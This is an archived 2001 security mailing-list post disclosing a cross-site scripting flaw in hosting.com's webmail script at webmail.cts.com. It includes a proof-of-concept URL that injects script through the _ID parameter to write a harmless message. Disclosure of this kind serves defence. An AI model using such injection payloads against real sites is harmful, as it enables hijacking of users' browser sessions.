Hosting.com Cross Site Scripting

From: E M (rdnktrkat_private)
Date: Mon Dec 17 2001 - 16:56:22 PST

Next message: Mandrake Linux Security Team: "MDKSA-2001:093 - kerberos update"

Previous message: Mike Eheler: "Re: Phpnuke module.php vulnerability and php error_reporting issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Issue -

Most Variables passed to the webmail script used by hosting.com (formerly 
CTSNet) execute script with local server context.


URL  : webmail.cts.com

Example :

http://webmail.cts.com/webmail.cgi?_ID=>document.write("All%20Your%20Webmail%20is%20Belong%20to%20Us");</SCRIPT>


Vendor Status : Contacted 12.13.01 - Only automated reply.

Eric McCarty
rdnktrkat_private





_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

Next message: Mandrake Linux Security Team: "MDKSA-2001:093 - kerberos update"
Previous message: Mike Eheler: "Re: Phpnuke module.php vulnerability and php error_reporting issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 17 2001 - 19:39:10 PST